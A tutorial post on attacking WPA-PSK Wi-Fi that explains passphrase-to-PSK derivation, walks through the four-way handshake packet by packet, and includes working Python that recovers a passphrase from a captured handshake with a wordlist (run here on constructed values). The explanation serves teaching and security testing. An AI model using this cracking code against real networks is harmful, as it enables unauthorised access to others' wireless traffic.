Wi-Fu - Attacking WPA-PSK - Part 1





Category: WPA/2

Published on Saturday, 18 January 2014 13:57

Introduction

The process of a wireless client authenticating and joining a WPA protected network is much more complex than it was for WEP. WPA frames are encrypted with dynamic keys, which are established during the authentication process (and then changed at regular intervals), but those keys are derived from a master key held by both parties. In WPA-Personal this master key is the Pre-Shared Key (PSK), which is used directly as the Pairwise Master Key (PMK); the two terms refer to the same 256-bit value.

Pre-Shared Key

The PSK is a 256-bit key which is derived from the passphrase using the Password Based Key Derivation Function (PBKDF2), documented in RFC 2898. PBKDF2 as used here is built on HMAC-SHA1 and takes the following inputs:

PSK = PBKDF2(Passphrase, SSID, SSIDlen, 4096, 256)

where:

Passphrase is the network password, 8 to 63 printable ASCII characters long
SSID and SSIDlen are the network name and its length in octets, used as the salt
4096 is the number of HMAC-SHA1 iterations performed for each block of output (SHA-1 yields 160 bits, so two blocks, 8192 HMAC operations in total, are needed for 256 bits)
256 is the size of the final key in bits (32 bytes)

Two consequences matter for an attacker. The SSID acts as a salt, so a table of precomputed PSKs is only useful against networks with that exact SSID. And because the full iteration count must be performed for every candidate passphrase, this derivation dominates the cost of a dictionary attack; the remaining steps of the handshake are cheap by comparison.
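The derivation above, written out as an added example (this is not code from the original article). It applies the 802.11 input rules for the passphrase and SSID, accepts a 64-hex-digit raw PSK as an alternative to a passphrase (the form wpa_supplicant's psk= setting takes, which skips PBKDF2 entirely), checks the result against the IEEE 802.11 test vector for passphrase "password" on SSID "IEEE", and shows that the SSID really does salt the result. The passphrase and SSIDs in the __main__ block are constructed for the demo.

```python
import hashlib
import re

# IEEE 802.11 PSK derivation test vector: passphrase "password", SSID "IEEE"
IEEE_TEST_VECTOR = ("password", "IEEE",
                    "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")

_HEX_PSK = re.compile(r"^[0-9a-fA-F]{64}$")


def derive_psk(passphrase: str, ssid: str) -> bytes:
    """Return the 256-bit PSK/PMK for a WPA-Personal network.

    PSK = PBKDF2-HMAC-SHA1(Passphrase, SSID, 4096 iterations, 256 bits).
    A 64-hex-digit string is treated as a raw PSK (as wpa_supplicant's psk=
    setting allows) and bypasses PBKDF2 entirely.
    """
    if _HEX_PSK.match(passphrase):
        return bytes.fromhex(passphrase)
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    if not all(32 <= ord(c) <= 126 for c in passphrase):
        raise ValueError("WPA passphrase must be printable ASCII (32..126)")
    ssid_bytes = ssid.encode("utf-8")
    if len(ssid_bytes) > 32:
        raise ValueError("SSID must be at most 32 octets")
    # 256 bits of output needs two 160-bit SHA-1 blocks: 2 * 4096 HMAC calls.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid_bytes, 4096, 32)


def self_test() -> bool:
    """Check the implementation against the IEEE test vector."""
    passphrase, ssid, expected = IEEE_TEST_VECTOR
    return derive_psk(passphrase, ssid).hex() == expected


def psk_depends_on_ssid(passphrase: str, ssid_a: str, ssid_b: str) -> bool:
    """True when the same passphrase gives different PSKs on two SSIDs, i.e. the
    SSID acts as a salt, so precomputed PSK tables only work per SSID."""
    return derive_psk(passphrase, ssid_a) != derive_psk(passphrase, ssid_b)


if __name__ == "__main__":
    print("IEEE test vector ok:", self_test())
    # Constructed example values, not taken from the article
    print("PSK for Summer2014! on corp-wifi:", derive_psk("Summer2014!", "corp-wifi").hex())
    print("SSID salts the PSK:", psk_depends_on_ssid("Summer2014!", "corp-wifi", "guest-wifi"))
```

Running the file prints the test vector check, a derived PSK and the salt demonstration; the same derive_psk output is what a capture-cracking tool has to compute once per candidate passphrase.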

The 4-Way Handshake

The purpose of this handshake phase is to derive the Pairwise Transient Key (PTK), the temporary key that actually protects data frames, and to let each side prove to the other that it holds the correct PMK (i.e. that the client knows the passphrase) without ever sending the PMK itself. Note that everything fed into the PTK derivation other than the PMK (both nonces and both MAC addresses) travels in the clear, and the MICs in the handshake messages are computed with a key taken from the PTK. An attacker who captures the exchange can therefore test passphrase guesses offline against a captured MIC, which is the basis of the attack described in this series.


Packet 1

Key Descriptor Version: RC4 Cipher, HMAC-MD5 MIC (1)
Key Type: Pairwise Key

The Key Descriptor Version line confirms the access point is using WPA with TKIP: version 1 means RC4 is used to wrap key material and HMAC-MD5 is used for the MIC, whereas version 2 (AES key wrap, HMAC-SHA1 MIC) would indicate CCMP. Key Type: Pairwise Key marks this as a pairwise (unicast) key exchange rather than a group key exchange.

Replay Counter: 0

The replay counter is set to a value n; it may not always be 0 as in this case. The client echoes the counter from each access point message in its reply, so both sides can match replies to requests and discard replayed or out-of-order handshake packets.

Install: Not set
Key MIC: Not set

Note that the Install and Key MIC flags are not yet set: the access point cannot compute a MIC until the PTK exists, and the PTK cannot exist until the client has contributed its nonce. The value in the field below is the ANonce, as it is generated and sent by the access point.

WPA Key Nonce: f7449f4ffb86488e5e23961b6eeb8625d3c0b11a5da73fe7...

Packet 2

Install: Not set
Key MIC: Set
Replay Counter: 0

The nonce in this packet is the SNonce, as it is generated and sent by the client. Using the ANonce, its own SNonce, the two MAC addresses and the PMK (see the Pairwise Transient Key section below), the client has already derived the PTK, calculated the MIC over this frame with the first 128 bits of the PTK (the Key Confirmation Key, KCK) and included it here. The replay counter is echoed unchanged from Packet 1.

WPA Key Nonce: 2fac8f76e7794763726ccbdb00ef275e97417b91b2e16a13...
WPA Key MIC: 8f4aeb8b937b5f48b1a9c741b382f61c

Packet 3

Install: Set
Key ACK: Set

The access point derives the PTK from the same information and checks the MIC sent by the client in Packet 2. If it matches, the client holds the same PMK and therefore the correct passphrase; if it does not, the handshake is abandoned. The access point then replies with the Install and Key ACK flags set, instructing the client to install the PTK and use it for data traffic. (In WPA2 this message also carries the Group Temporal Key, encrypted with the Key Encryption Key taken from the PTK; original WPA, as captured here, delivers it in a separate group key handshake.)

Replay Counter: 1

The Replay Counter is increased by 1.

Key MIC: Set

WPA Key MIC: 5ec94d0a78b6a929501149624b9fa0b0

This MIC is computed by the access point with the same KCK. Verifying it is how the client confirms that the access point also knows the PMK, rather than being a rogue access point that merely replayed Packet 1.


Packet 4

Replay Counter: 1
Key ACK: Not set

The client confirms that it has installed the PTK. The replay counter matches Packet 3, and the Key ACK flag is clear: Key ACK is only ever set by the access point, so its absence marks this as the final, client-to-access-point message of the handshake. Encrypted data traffic can start once both sides have installed the PTK.

WPA Key MIC: f3e29f4334b9f4ee8f999ec1823281e8

Pairwise Transient Key

This is the key used to protect data whilst it is in transit. It is not derived with PBKDF2 but with the IEEE 802.11 pseudo-random function (PRF), which concatenates HMAC-SHA1 outputs over a fixed label, the two MAC addresses and the two nonces:

PTK = PRF-512(PMK, "Pairwise key expansion", Min(AMAC, SMAC) || Max(AMAC, SMAC) || Min(ANonce, SNonce) || Max(ANonce, SNonce))

where:

PMK is the Pairwise Master Key, i.e. the PSK
AMAC is the MAC address of the Access Point (authenticator)
SMAC is the MAC address of the client (supplicant)
ANonce and SNonce are the random values exchanged in Packets 1 and 2
Min and Max order each pair byte-wise so that both sides build the same input

For TKIP the 512-bit PTK is split into the Key Confirmation Key (KCK, bytes 0-15, used for the handshake MICs), the Key Encryption Key (KEK, bytes 16-31), the Temporal Key (TK, bytes 32-47) and two 64-bit Michael MIC keys (bytes 48-63). CCMP uses PRF-384 and stops after the TK. Because only the PMK is secret, an attacker holding a captured handshake can repeat this derivation for each candidate passphrase and compare the resulting MIC with the captured one.
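The whole chain from passphrase to handshake MIC, and the offline check an attacker runs against a capture, as an added example (not code from the original article). It implements the PRF, the PTK split and the EAPOL-Key MIC for both descriptor versions (HMAC-MD5 for version 1 as in the capture above, HMAC-SHA1-128 for version 2), simulates the client building Packet 2, and then recovers the passphrase from that frame with a small wordlist. The MAC addresses, nonces, SSID, passphrase, wordlist and WPA information element are constructed for the demo; the frame layout (MIC at offset 81, nonce at offset 17, Key Information 0x0109, descriptor type 254) follows the EAPOL-Key format.

```python
import hashlib
import hmac

# --- key derivation --------------------------------------------------------

def derive_psk(passphrase: str, ssid: str) -> bytes:
    """PSK/PMK = PBKDF2-HMAC-SHA1(Passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbits: int) -> bytes:
    """IEEE 802.11 PRF-n: R = R || HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    out = b""
    for i in range((nbits + 159) // 160):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[: nbits // 8]


def derive_ptk(pmk: bytes, amac: bytes, smac: bytes, anonce: bytes, snonce: bytes,
               nbits: int = 512) -> bytes:
    """PTK = PRF-X(PMK, "Pairwise key expansion", Min(AMAC,SMAC) || Max(AMAC,SMAC)
    || Min(ANonce,SNonce) || Max(ANonce,SNonce)); 512 bits for TKIP, 384 for CCMP."""
    data = min(amac, smac) + max(amac, smac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, nbits)


# --- EAPOL-Key frame handling ----------------------------------------------

NONCE_OFFSET = 17              # Key Nonce position inside the 802.1X frame
MIC_OFFSET, MIC_LEN = 81, 16   # Key MIC position and length


def build_msg2(snonce: bytes, replay_counter: int, key_data: bytes,
               mic: bytes = b"\x00" * 16) -> bytes:
    """Constructed WPA (descriptor type 254) message 2. Key Information 0x0109 =
    descriptor version 1 (RC4/HMAC-MD5), Pairwise, Key MIC set; Install/Key ACK clear."""
    body = (bytes([0xFE]) + (0x0109).to_bytes(2, "big") + (32).to_bytes(2, "big")
            + replay_counter.to_bytes(8, "big") + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8      # Key IV, Key RSC, Key ID
            + mic + len(key_data).to_bytes(2, "big") + key_data)
    return bytes([0x01, 0x03]) + len(body).to_bytes(2, "big") + body  # 802.1X v1, EAPOL-Key


def eapol_mic(kck: bytes, frame: bytes, version: int) -> bytes:
    """MIC over the whole EAPOL-Key frame with its MIC field zeroed.
    Version 1 (TKIP): HMAC-MD5. Version 2 (CCMP): first 128 bits of HMAC-SHA1."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + frame[MIC_OFFSET + MIC_LEN:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def supplicant_msg2(passphrase, ssid, amac, smac, anonce, snonce, replay_counter=0):
    """What the client does on receiving Packet 1: derive the PTK, MIC the frame with the KCK."""
    kck = derive_ptk(derive_psk(passphrase, ssid), amac, smac, anonce, snonce)[:16]
    wpa_ie = bytes.fromhex("dd160050f20101000050f20201000050f20201000050f202")  # constructed WPA IE (TKIP/PSK)
    unsigned = build_msg2(snonce, replay_counter, wpa_ie)
    return build_msg2(snonce, replay_counter, wpa_ie, eapol_mic(kck, unsigned, 1))


# --- the attack: offline MIC check against a captured handshake -----------

def crack_psk(ssid, amac, smac, anonce, msg2, wordlist, version=1):
    """Repeat PMK -> PTK -> KCK -> MIC for each candidate; the candidate whose MIC equals
    the captured one is the passphrase. Everything except the passphrase is in the capture."""
    snonce = msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        kck = derive_ptk(derive_psk(candidate, ssid), amac, smac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2, version), captured_mic):
            return candidate
    return None


# Constructed demo values (not taken from the article's capture)
SSID = "corp-wifi"
AMAC = bytes.fromhex("001122334455")
SMAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
CAPTURED_MSG2 = supplicant_msg2("Summer2014!", SSID, AMAC, SMAC, ANONCE, SNONCE)
WORDLIST = ["password", "letmein123", "Summer2014!", "wrongpass1"]

if __name__ == "__main__":
    print("MIC in captured Packet 2:", CAPTURED_MSG2[MIC_OFFSET:MIC_OFFSET + MIC_LEN].hex())
    print("recovered passphrase:", crack_psk(SSID, AMAC, SMAC, ANONCE, CAPTURED_MSG2, WORDLIST))
```

The loop in crack_psk is exactly what aircrack-ng and similar tools do with a captured handshake; the PBKDF2 call inside derive_psk is the expensive step, while the PRF and MIC are a handful of HMAC operations. Only Packet 1 (for the ANonce) and Packet 2 (for the SNonce and a MIC) are strictly required, which is why a capture that misses Packets 3 and 4 is still enough to attack.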
